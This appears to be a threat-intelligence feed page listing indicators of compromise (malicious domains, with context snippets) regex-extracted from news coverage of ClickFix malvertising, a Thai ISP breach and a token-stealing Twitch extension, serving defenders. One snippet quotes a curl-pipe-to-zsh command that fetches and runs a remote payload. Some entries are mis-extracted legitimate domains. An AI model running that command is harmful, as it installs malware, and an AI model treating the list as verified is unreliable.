ZeroHour

Indicators of compromise

1,849 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainhbomaxx.appblocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainhbomaxx.usrs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as domaHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainhbubagent.comarbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainheroestales.compyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]coHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainhomebrwmac-hub.comadesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains DomaiHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainhoustongaragedoorinstallers.com.]com September macOS telemetry and delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aiHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainlakhov.comme[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper andHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainlalandscapelighting.comustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgiaHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainleaf68.comtrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainloop-lumen.com[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domainsHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmacdeveloperhub.coms-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmacfixguide.comcrisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; recHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmacstoragetips.comva-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepageHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmarbellaresales.comheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MaHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmicrosoftupdater.infopage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmpasvw.com-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domaiHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainmuse-code-ide.com]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; clHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnode-slate.comins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]cHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnova-desk.top-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-toHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnova-fix.topins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novasHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnova-hub.topdiag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnova-labs.topova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnovastacktips.comx[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com ProvisioningHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainnova-tools.topesk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetiHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainoakenfjrod.ruFake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]naHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainopendisplay.us-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainouilov.comgrove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loopHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainpapartybus.comogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; spHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainperchframe15.commains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainpine63.comcom; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainpinescope11.comlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainpress29.comm; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainpressureulcerlawyer.comdelivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainrectangleap.com.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; cHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainremotion-skills.comop; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains DHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainrestoremental.comgtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemadeHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainrudder-moss.comivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domaiHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainsgaaagent.comcom; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; bHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainsic180.comrsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains DoHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainsprieagent.com]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]coHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainstorageprofiler.comle activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contacHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainthepullmanfolkestone.comsioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlinHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domaintrekmesh15.com9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; eHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainumapla.comom AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktopHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainverse-18.com[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainwantsellonline.comosoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainweaveridge7.com]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com SepteHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainwuess.comn weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain houHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 2d ago
domainopusaccel.topand loop that polls a command-and-control (C2) server ("ocr.opusaccel[.]top") to receive further instructions that are then executedChina-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE
The Hacker News
· 2d ago
domaincode-desktop.compromoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . ThHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 2d ago
domaincodex-craft.cominting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usiHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 2d ago
domainhbomax-macos.comng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both enHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 2d ago
domainhbomaxx.appal lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 2d ago
domainhbomaxx.uscted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the siteHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 2d ago
domainayuthayatech.comfied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. AHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 2d ago
domainco.thfocused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performeHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 2d ago
domainhunt.io10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a compHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 2d ago
domaintriplet.coernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested tHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 2d ago
domainabchina.com.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural CreditTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 2d ago
domainccb.comk of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unioTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 2d ago
domaincom.cnNote: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/AgricultuTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 2d ago
domainlzbank.comBank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abcTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 2d ago
domainclean-disk-guide.comOf the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktopHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domaincode-desktop.comsk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributioHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domaincodex-craft.comtrick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS diHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domainhbomax-macos.comMax lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an OpeHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domainhbomaxx.apps, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospectHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domainhbomaxx.usn be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking thHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 2d ago
domainttvnw.nettension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= qTwitch extension with 30K installs exposes users’ OAuth tokens
BleepingComputer
· 2d ago
domainclean-disk-guide.comAI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hboHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domaincode-desktop.com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the aHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domaincodex-craft.comhbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing tHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domainember-bridge.comlowing command: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Hudson Rock noted ember-bHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domainhbomax-macos.com.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience tHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domainhbomaxx.appddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[Hackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domainhbomaxx.usMax subreddits," warned the user . "The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /Hackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 2d ago
domainagent.3bb.coeshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 2d ago
domainayuthayatech.comreporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 2d ago
domainco.ths over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 2d ago
domainhunt.iotacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 2d ago
domainayuthayatech.coms to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enroHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 2d ago
domainco.tha FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPNHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 2d ago
domainhunt.ioconfiguration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 2d ago
domaintriplet.co, including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A captureHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 2d ago
domainf5.comallowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructureHackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials
Cyber Security News
· 2d ago
domainserver.hostse it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingressHackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials
Cyber Security News
· 2d ago
domainserver.hostpose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology compHackers target exposed Vite dev servers to steal AWS, Azure secrets
BleepingComputer
· 2d ago
domainalexue4.devm Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainapi.jeetbot.cc7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]ccMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domaindrisnya.online6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hostMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainenhanced-1.jeetbot.cctbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainenhanced.jeetbot.ccGermany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainext-03.jeetbot.ccIP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain aMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainext-styles.jeetbot.ccP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domaingmail.comtbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifierMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainimg.drisnya.onlineelper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation HiMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainjeetbot.ccssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainmorphilina.me]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODOMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainproxy.morphilina.mejeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-sMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago
domainproxy.thebeholder.deno.netup token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endpMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 2d ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.